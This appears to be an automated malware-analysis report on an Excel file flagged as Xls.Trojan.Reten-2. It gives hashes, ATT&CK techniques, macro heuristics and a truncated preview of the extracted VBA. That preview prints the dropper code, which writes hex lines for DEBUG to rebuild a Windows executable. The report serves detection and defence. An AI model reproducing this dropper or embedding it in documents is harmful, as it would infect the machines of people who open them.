Xls.Trojan.Reten-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 476007e11c6e1ae1…

MALICIOUS

Office (OLE)

Size: 116.5 KB · Created: 2000-07-25 20:43:03 · Authoring application: Microsoft Excel · First seen: 2012-06-14
MD5: df134e581ab1aaf700ac117f15ad1272
SHA-1: 3f11c417fd2346e45a81486c09797dd587c651ca
SHA-256: 476007e11c6e1ae1b3bafc3f8495ba4a4762836db36e6b2a6e68f0576c8bb6e0
Risk Score: 220

Malware Insights

Xls.Trojan.Reten-2 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Reten-2. It contains VBA macros, including an Auto_Open macro, a common technique for executing malicious code as soon as the document is opened. The extracted script attempts to write a file named 'N Wow.com', which likely serves as a downloader for a secondary payload.

Heuristics (4)

  • ClamAV: Xls.Trojan.Reten-2 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Trojan.Reten-2
  • VBA macros detected [medium, 2 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Auto_Open macro [high, OLE_VBA_AUTO]
    Auto_Open macro
  • Auto_Close macro [high, OLE_VBA_AUTOCLOSE]
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 157497 bytes
SHA-256: 9d0168fedfa33b1e633adde9fce60948c6a3606b3b4ffc14dc71c663369fea94
Detection: ClamAV: Xls.Trojan.Reten-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Project_P"
Function Val33333()
    Dim hFile As Long
    hFile = FreeFile
    Open strFile For Output Access Write As hFile
Print #hFile, "N Wow.com"
Print #hFile, "E 0100 4D 5A 36 01 01 00 00 00 04 00 00 00 FF FF 00 00"
Print #hFile, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #hFile, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00"
Print #hFile, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #hFile, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 72 65 71 75 69"
Print #hFile, "E 0160 72 65 73 20 4D 69 63 72 6F 73 6F 66 74 20 57 69"
Print #hFile, "E 0170 6E 64 6F 77 73 2E 0D 0A 24 00 00 00 00 00 00 00"
Print #hFile, "E 0180 4E 45 05 3C 9F 00 0F 00 00 00 00 00 02 03 02 00"
Print #hFile, "E 0190 00 04 00 14 1A 00 01 00 00 00 02 00 02 00 02 00"
Print #hFile, "E 01A0 3D 00 40 00 50 00 85 00 8E 00 92 00 2E 01 00 00"
Print #hFile, "E 01B0 02 00 04 00 00 00 02 08 18 00 0C 01 00 00 0A 03"
Print #hFile, "E 01C0 1A 00 39 0C 50 1D 39 0C F6 00 94 02 51 0C 94 02"
Print #hFile, "E 01D0 04 00 0E 80 01 00 00 00 00 00 24 01 02 00 30 1C"
Print #hFile, "E 01E0 2C 00 00 00 00 00 03 80 01 00 00 00 00 00 26 01"
Print #hFile, "E 01F0 2F 00 30 1C 01 80 00 00 00 00 00 00 08 41 4C 4F"
Print #hFile, "E 0200 41 50 49 43 4F 05 41 4C 4F 41 50 00 00 00 01 00"
Print #hFile, "E 0210 08 00 00 06 4B 45 52 4E 45 4C 04 55 53 45 52 02"
Print #hFile, "E 0220 FF 01 CD 3F 01 16 0A 01 CD 3F 01 18 0B 00 15 41"
Print #hFile, "E 0230 20 6D 69 6E 69 6D 75 6D 20 41 70 70 6C 69 63 61"
Print #hFile, "E 0240 74 69 6F 6E 00 00 09 45 58 43 49 54 50 52 4F 43"
Print #hFile, "E 0250 02 00 15 4F 56 45 52 4C 41 50 50 45 44 57 49 4E"
Print #hFile, "E 0260 44 4F 57 50 52 4F 43 31 01 00 00 00 00 00 00 00"
Print #hFile, "E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 02B0 FF FF B0 FF 50 9A DD 01 3C 0B 33 ED 55 9A FF FF"
Print #hFile, "E 02C0 00 00 0B C0 74 EC 8C 06 46 00 81 C1 00 01 72 E2"
Print #hFile, "E 02D0 89 0E 10 00 89 36 12 00 89 3E 14 00 89 1E 16 00"
Print #hFile, "E 02E0 8C 06 18 00 89 16 1A 00 9A FF FF 00 00 86 C4 A3"
Print #hFile, "E 02F0 48 00 B4 30 2E F7 06 10 00 01 00 74 07 9A FF FF"
Print #hFile, "E 0300 00 00 EB 02 CD 21 A3 4C 00 86 C4 A3 4A 00 2E F7"
Print #hFile, "E 0310 06 10 00 01 00 75 05 B0 00 A2 4F 00 33 C0 50 9A"
Print #hFile, "E 0320 FF FF 00 00 FF 36 14 00 9A FF FF 00 00 0B C0 74"
Print #hFile, "E 0330 81 9A F0 00 18 00 9A D4 02 94 00 9A 56 04 99 00"
Print #hFile, "E 0340 E8 43 07 FF 36 84 00 FF 36 82 00 FF 36 80 00 9A"
Print #hFile, "E 0350 C4 00 9E 00 83 C4 06 50 9A CF 01 B2 00 B8 15 00"
Print #hFile, "E 0360 E9 28 04 00 8C D8 90 45 55 8B EC 1E 8
... (truncated)